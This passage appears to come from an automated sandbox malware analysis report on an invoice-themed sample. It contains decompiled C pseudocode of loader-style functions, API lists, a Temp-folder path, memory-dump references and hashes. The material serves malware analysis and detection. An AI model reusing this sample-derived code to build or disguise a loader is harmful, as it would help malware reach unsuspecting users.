										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t263 = _t259 - 1;
							__eflags = _t263;
							if(_t263 == 0) {
								_v16 = _t284;
								goto L74;
							}
							__eflags = _t263 != 1;
							if(_t263 != 1) {
								goto L141;
							}
							_t266 = _t287 - 0x21;
							__eflags = _t266;
							if(_t266 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t267 = _t266 - 0x42;
							__eflags = _t267;
							if(_t267 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t319 + 0x1010;
									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t272 = _t267;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(0x20);
								L56:
								_pop(1);
								goto L57;
							}
							_t273 = _t272 - 9;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(8);
								goto L56;
							}
							_t274 = _t273 - 4;
							__eflags = _t274;
							if(_t274 == 0) {
								_push("true");
								goto L56;
							}
							_t275 = _t274 - 1;
							__eflags = _t275;
							if(_t275 == 0) {
								_push(0x10);
								goto L56;
							}
							__eflags = _t275 != 0;
							if(_t275 != 0) {
								goto L61;
							}
							_push(0x40);
							goto L56;
						}
						goto L15;
					}
					_t278 = _t249 - 5;
					if(_t278 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t284;
						_v20 = _t284;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t284;
						goto L17;
					}
					_t282 = _t278 - 1;
					if(_t282 == 0) {
						_v32 = 2;
						_v8 = _t284;
						_v20 = _t284;
						goto L17;
					}
					if(_t282 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
					L161:
					return _t319;
				} else {
					_t216 =  *_t319 - 1;
					if(_t216 == 0) {
						_t178 = _t319 + 8; // 0x8
						_t312 = _t178;
						__eflags =  *_t312 - _t284;
						if( *_t312 != _t284) {
							_t217 = GetModuleHandleW(_t312);
							__eflags = _t217 - _t284;
							 *(_t319 + 0x1008) = _t217;
							if(_t217 != _t284) {
								L150:
								_t183 = _t319 + 0x808; // 0x808
								_t313 = _t183;
								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
								__eflags = _t218 - _t284;
								 *(_t319 + 0x100c) = _t218;
								if(_t218 == _t284) {
									__eflags =  *_t313 - 0x23;
									if( *_t313 == 0x23) {
										_t186 = _t319 + 0x80a; // 0x80a
										_t222 = E10001311(_t186);
										__eflags = _t222 - _t284;
										if(_t222 != _t284) {
											__eflags = _t222 & 0xffff0000;
											if((_t222 & 0xffff0000) == 0) {
												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t284;
								if(_v48 != _t284) {
									L157:
									_t313[lstrlenW(_t313)] = 0x57;
									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
									__eflags = _t220 - _t284;
									if(_t220 != _t284) {
										L145:
										 *(_t319 + 0x100c) = _t220;
										goto L161;
									}
									__eflags =  *(_t319 + 0x100c) - _t284;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t197 = _t319 + 4;
									 *_t197 =  *(_t319 + 4) | 0xffffffff;
									__eflags =  *_t197;
									goto L161;
								} else {
									__eflags =  *(_t319 + 0x100c) - _t284;
									if( *(_t319 + 0x100c) != _t284) {
										goto L161;
									}
									goto L157;
								}
							}
							_t225 = LoadLibraryW(_t312);
							__eflags = _t225 - _t284;
							 *(_t319 + 0x1008) = _t225;
							if(_t225 == _t284) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t319 + 0x808; // 0x808
						_t227 = E10001311(_t179);
						 *(_t319 + 0x100c) = _t227;
						__eflags = _t227 - _t284;
						goto L159;
					}
					_t228 = _t216 - 1;
					if(_t228 == 0) {
						_t176 = _t319 + 0x808; // 0x808
						_t229 = _t176;
						__eflags =  *_t229 - _t284;
						if( *_t229 == _t284) {
							goto L161;
						}
						_t220 = E10001311(_t229);
						L144:
						goto L145;
					}
					if(_t228 != 1) {
						goto L161;
					}
					_t80 = _t319 + 8; // 0x8
					_t285 = _t80;
					_t314 = E10001311(_t80);
					 *(_t319 + 0x1008) = _t314;
					if(_t314 == 0) {
						goto L160;
					}
					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
					_t89 = _t319 + 0x808; // 0x808
					_t220 =  *(_t314->i + E10001311(_t89) * 4);
					goto L144;
				}
			}

0x10001b20
0x10001b23
0x10001b26
0x10001b29
0x10001b2c
0x10001b2f
0x10001b32
0x10001b34
0x10001b37
0x10001b3c
0x10001b3f
0x10001b47
0x10001b4f
0x10001b51
0x10001b54
0x10001b5c
0x10001b5c
0x10001b61
0x10001b64
0x00000000
0x00000000
0x10001b6e
0x10001b71
0x10001b76
0x10001b78
0x10001beb
0x10001beb
0x10001beb
0x10001bef
0x10001bf2
0x10001bf4
0x10001c16
0x10001c18
0x10001c1b
0x10001c2a
0x10001c2c
0x10001c32
0x10001c32
0x10001c38
0x10001c3b
0x10001c3b
0x10001c3e
0x10001c3e
0x10001c44
0x10001c46
0x10001c46
0x10001c48
0x10001c4b
0x10001c4e
0x10001c54
0x10001c5a
0x10001c5d
0x10001c81
0x10001c84
0x00000000
0x00000000
0x10001c87
0x10001c89
0x10001c97
0x10001c9a
0x10001c9c
0x00000000
0x00000000
0x00000000
0x00000000
0x10001c9e
0x10001c9e
0x10001c9e
0x10001ca4
0x10001ca6
0x00000000
0x00000000
0x10001ca8
0x10001caa
0x10001cac
0x10001cae
0x00000000
0x00000000
0x00000000
0x10001cae
0x10001cb0
0x10001cb2
0x10001cb4
0x10001cb4
0x10001cba
0x10001cc0
0x10001cc2
0x10001cd6
0x10001cd6
0x10001cd8
0x10001cc4
0x10001cca
0x10001ccd
0x10001ccd
0x00000000
0x10001c5f
0x10001c5f
0x10001c5f
0x10001c60
0x10001c68
0x10001c6c
0x10001c72
0x10001c76
0x10001cde
0x10001ce1
0x10001ce5
0x10001d70
0x10001d74
0x10001b59
0x00000000
0x10001b59
0x00000000
0x10001d74
0x10001c62
0x10001c62
0x10001c63
0x00000000
0x00000000
0x10001c65
0x10001c66
0x00000000
0x00000000
0x00000000
0x10001c66
0x10001c5d
0x10001bf7
0x00000000
0x00000000
0x10001c00
0x10001c03
0x10001c10
0x10001c10
0x10001c05
0x00000000
0x10001c05
0x10001b7a
0x10001b7d
0x10001bce
0x10001bd1
0x10001be3
0x10001be3
0x10001be6
0x00000000
0x10001be6
0x10001bd3
0x10001bd8
0x00000000
0x00000000
0x10001bda
0x10001bdd
0x10001ced
0x10001cf0
0x10001cf0
0x10001cf2
0x10002048
0x1000204b
0x100020b2
0x10001d60
0x10001d63
0x10001d66
0x10001d69
0x10001d69
0x10001d6b
0x10001d6c
0x10001d6c
0x10001d6d
0x00000000
0x10001d6d
0x1000204d
0x10002050
0x10002057
0x10002057
0x1000205b
0x1000206f
0x1000206f
0x10002072
0x10002076
0x100020be
0x100020c1
0x100020c5
0x00000000
0x100020c5
0x10002078
0x1000207c
0x00000000
0x00000000
0x1000207e
0x10002085
0x10002085
0x1000208b
0x1000208e
0x100020aa
0x10002090
0x10002099
0x1000209c
0x1000209c
0x00000000
0x1000208e
0x1000205d
0x10002060
0x10002064
0x00000000
0x00000000
0x10002066
0x00000000
0x10002066
0x10002052
0x10002055
0x00000000
0x00000000
0x00000000
0x10002055
0x10001cf8
0x10001cf8
0x10001cf9
0x10001e29
0x10001e29
0x10001e2e
0x10001e31
0x00000000
0x00000000
0x10001e3e
0x00000000
0x10001fe5
0x10001fe8
0x10001feb
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x10001ff8
0x10001ff8
0x10001ffc
0x10002014
0x10002017
0x10002021
0x00000000
0x10002021
0x10001ffe
0x10001ffe
0x10002001
0x00000000
0x00000000
0x10002003
0x10002006
0x10002008
0x10002009
0x10002009
0x10002009
0x1000200a
0x1000200d
0x10002010
0x10002011
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x00000000
0x10001ff6
0x00000000
0x10001e85
0x00000000
0x00000000
0x10001e91
0x00000000
0x00000000
0x10001e78
0x10001e7c
0x10001e80
0x00000000
0x00000000
0x10001fb6
0x10001fba
0x00000000
0x00000000
0x10001fc0
0x10001fc9
0x10001fd0
0x10001fd8
0x00000000
0x00000000
0x10001f53
0x10001f53
0x00000000
0x00000000
0x10001e9a
0x00000000
0x00000000
0x10002040
0x00000000
0x00000000
0x10002030
0x00000000
0x00000000
0x10002034
0x00000000
0x00000000
0x1000203c
0x00000000
0x00000000
0x10001f76
0x00000000
0x00000000
0x10001f5b
0x10001f5d
0x00000000
0x00000000
0x10001f7e
0x00000000
0x00000000
0x10001f63
0x00000000
0x00000000
0x10001f67
0x00000000
0x00000000
0x10002038
0x10002042
0x10002042
0x00000000
0x00000000
0x10001f86
0x10001f8a
0x10001f8f
0x10001f92
0x10001f93
0x10001f96
0x10001f9c
0x10001f9c
0x00000000
0x00000000
0x10002028
0x00000000
0x00000000
0x10001f6b
0x10001f6e
0x10001f70
0x00000000
0x00000000
0x10001ea1
0x10001ea1
0x00000000
0x00000000
0x10001f7a
0x10001f80
0x10001f80
0x10001ea3
0x10001ea3
0x10001ea6
0x10001ead
0x10001eb0
0x10001eb2
0x10001eb4
0x10001eb5
0x10001eb9
0x10001ebc
0x10001ec2
0x10001ec8
0x10001ec8
0x10001eca
0x10001eca
0x10001ecd
0x10001ed3
0x10001ed5
0x10001ed9
0x10001ede
0x10001ede
0x10001ee0
0x10001ee0
0x10001ee3
0x10001ee6
0x10001eef
0x10001ef5
0x10001ef8
0x10001ef8
0x10001efa
0x10001efd
0x10001f03
0x00000000
0x10001f03
0x10001ec4
0x10001ec6
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e45
0x10001e4b
0x10001e4e
0x10001e50
0x10001e50
0x10001e53
0x10001e57
0x10001e64
0x10001e66
0x10001e6c
0x10001e6c
0x10001e6c
0x00000000
0x00000000
0x10001fa4
0x10001fa8
0x10001fad
0x10001fb0
0x10001f09
0x10001f09
0x10001f0b
0x00000000
0x00000000
0x10001f11
0x10001f11
0x10001f15
0x10001f1c
0x10001f40
0x10001f40
0x10001f44
0x10001f46
0x10001f49
0x10001f49
0x10001f4c
0x10001f4c
0x00000000
0x10001f44
0x10001f21
0x10001f24
0x10001f24
0x10001f2b
0x10001f2d
0x10001f30
0x10001f37
0x10001f38
0x10001f3e
0x10001f3e
0x00000000
0x10001f3e
0x10001f32
0x10001f35
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e3e
0x10001cff
0x10001cff
0x10001d00
0x10001e26
0x00000000
0x10001e26
0x10001d06
0x10001d07
0x00000000
0x00000000
0x10001d0f
0x10001d0f
0x10001d12
0x10001d5d
0x00000000
0x10001d5d
0x10001d14
0x10001d14
0x10001d17
0x10001d41
0x10001d44
0x10001d47
0x10001e18
0x10001e18
0x10001e18
0x10001d4d
0x10001d4d
0x10001d4d
0x10001e1e
0x00000000
0x10001e1e
0x10001d1a
0x10001d1a
0x10001d1b
0x10001d3e
0x10001d40
0x10001d40
0x00000000
0x10001d40
0x10001d1d
0x10001d1d
0x10001d20
0x10001d3a
0x00000000
0x10001d3a
0x10001d22
0x10001d22
0x10001d25
0x10001d36
0x00000000
0x10001d36
0x10001d27
0x10001d27
0x10001d28
0x10001d32
0x00000000
0x10001d32
0x10001d2b
0x10001d2c
0x00000000
0x00000000
0x10001d2e
0x00000000
0x10001d2e
0x00000000
0x10001bdd
0x10001b7f
0x10001b82
0x10001bb1
0x10001bb5
0x10001bbc
0x10001bc3
0x10001bc6
0x10001bc9
0x00000000
0x10001bc9
0x10001b84
0x10001b85
0x10001ba0
0x10001ba7
0x10001baa
0x00000000
0x10001baa
0x10001b8a
0x00000000
0x10001b90
0x10001b90
0x10001b97
0x00000000
0x10001b97
0x10001b8a
0x10001d83
0x10001d88
0x10001d8d
0x10001d91
0x100021c5
0x100021cb
0x10001da3
0x10001da5
0x10001da6
0x100020ee
0x100020ee
0x100020f1
0x100020f4
0x10002111
0x10002117
0x10002119
0x1000211f
0x10002136
0x10002136
0x10002136
0x10002143
0x10002149
0x1000214c
0x10002152
0x10002154
0x10002158
0x1000215a
0x10002161
0x10002166
0x10002169
0x1000216b
0x10002170
0x10002182
0x10002182
0x10002170
0x10002169
0x10002158
0x10002188
0x1000218b
0x10002195
0x1000219d
0x100021aa
0x100021b0
0x100021b3
0x100020e3
0x100020e3
0x00000000
0x100020e3
0x100021b9
0x100021bf
0x100021bf
0x00000000
0x00000000
0x100021c1
0x100021c1
0x100021c1
0x100021c1
0x00000000
0x1000218d
0x1000218d
0x10002193
0x00000000
0x00000000
0x00000000
0x10002193
0x1000218b
0x10002122
0x10002128
0x1000212a
0x10002130
0x00000000
0x00000000
0x00000000
0x10002130
0x100020f6
0x100020fd
0x10002103
0x10002109
0x00000000
0x10002109
0x10001dac
0x10001dad
0x100020cd
0x100020cd
0x100020d3
0x100020d6
0x00000000
0x00000000
0x100020dd
0x100020e2
0x00000000
0x100020e2
0x10001db4
0x00000000
0x00000000
0x10001dba
0x10001dba
0x10001dc3
0x10001dc8
0x10001dce
0x00000000
0x00000000
0x10001dd4
0x10001de1
0x10001de7
0x10001df1
0x10001df7
0x10001dff
0x10001e0f
0x00000000
0x10001e0f

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
GlobalFree.KERNEL32(00000000), ref: 10001C89
GlobalFree.KERNEL32(?), ref: 10001D83
GlobalFree.KERNEL32(?), ref: 10001D88
GlobalFree.KERNEL32(?), ref: 10001D8D
GlobalFree.KERNEL32(00000000), ref: 10001F38
lstrcpyW.KERNEL32(?,?), ref: 1000209C

Memory Dump Source

Source File: 00000000.00000002.1463432748.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1463396007.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1463469816.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1463524699.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

Uniqueness

Uniqueness Score: -1.00%

Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004020FE() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x4c)) = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x3c)) = E00402C37(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402C37(2);
				 *((intOrPtr*)(_t107 - 0x48)) = E00402C37(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402C37(0x45);
				_t52 =  *(_t107 - 0x18);
				 *(_t107 - 0x44) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405BA7( *((intOrPtr*)(_t107 - 0x3c))) == 0) {
					E00402C37(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084dc, _t83, "true", 0x4084cc, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084ec, _t107 - 0x30);
					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x3c)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
						_t91 =  *((intOrPtr*)(_t107 - 0x48));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x30));
							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x4c)), "true");
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x30));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x00402107
0x00402111
0x0040211b
0x00402125
0x00402130
0x00402133
0x0040214d
0x00402150
0x00402156
0x00402159
0x00402163
0x00402167
0x00402167
0x0040216c
0x0040217d
0x00402185
0x0040223c
0x0040223c
0x00402243
0x0040218b
0x0040218b
0x0040219a
0x0040219e
0x004021a1
0x004021a7
0x004021b5
0x004021b8
0x004021ba
0x004021c5
0x004021c5
0x004021ca
0x004021cc
0x004021d3
0x004021d3
0x004021d6
0x004021df
0x004021e2
0x004021e8
0x004021ea
0x004021f4
0x004021f4
0x004021f7
0x00402200
0x00402203
0x0040220c
0x00402212
0x00402214
0x00402222
0x00402222
0x00402225
0x0040222b
0x0040222b
0x0040222e
0x00402234
0x0040223a
0x0040224f
0x00000000
0x00000000
0x00000000
0x0040223a
0x00402245
0x00402ac2
0x00402ace

APIs

CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D

Strings

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated, xrefs: 004021BD

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated
API String ID: 542301482-3781222300
Opcode ID: 75bd8e49128f364a0fc7c4c1a7bdc2d45d81300e390856c6e58ec56fd8bb38af
Instruction ID: 12128347f435f69461b39f0114e3e01667000ffa0243525f0bda7dd6f9c1772f
Opcode Fuzzy Hash: 75bd8e49128f364a0fc7c4c1a7bdc2d45d81300e390856c6e58ec56fd8bb38af
Instruction Fuzzy Hash: BF4139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402862(short __ebx, short* __esi) {
				void* _t21;

				if(FindFirstFileW(E00402C37(2), _t21 - 0x2d4) != 0xffffffff) {
					E004061A6( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2a8);
					_push(__esi);
					E0040625F();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x0040287a
0x00402895
0x004028a0
0x004028a1
0x004029db
0x0040287c
0x0040287f
0x00402882
0x00402885
0x00402885
0x00402ac2
0x00402ace

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 6634e00a7cf8ae9f81784cc3fd27b444408b2eeaa47297c107ee77c483e0c32a
Instruction ID: cb5017da262a82374af33b7b9c4435bd67f431664fd16e1eaa48b990974d77dd
Opcode Fuzzy Hash: 6634e00a7cf8ae9f81784cc3fd27b444408b2eeaa47297c107ee77c483e0c32a
Instruction Fuzzy Hash: 88F08C71A04104AFDB10EBA4DE49AADB378EF10314F2046BBF501F21D1DBB84E819B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00404391 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404391(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t108;
				signed int _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L13:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x79feec =  *0x79feec + 1;
								__eflags =  *0x79feec;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040425B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
								_t103 =  *((intOrPtr*)(_t114 + 0x1c));
								_t113 =  *((intOrPtr*)(_t114 + 0x18));
								_v12 = _t103;
								__eflags = _t103 - _t113 - 0x800;
								_v16 = _t113;
								_v8 = 0x7a69c0;
								if(_t103 - _t113 < 0x800) {
									SendMessageW(_t56, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorW(0, 0x7f02));
									_push("true");
									E00404640(_a4, _v8);
									SetCursor(LoadCursorW(0, 0x7f00));
									_t114 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x700;
						if( *((intOrPtr*)(_t114 + 8)) != 0x700) {
							goto L28;
						} else {
							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
								goto L28;
							}
							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x7a8a28, 0x111, "true", 0);
							}
							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x7a8a28, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L27;
					}
					__eflags =  *0x79feec; // 0x0
					if(__eflags != 0) {
						goto L27;
					}
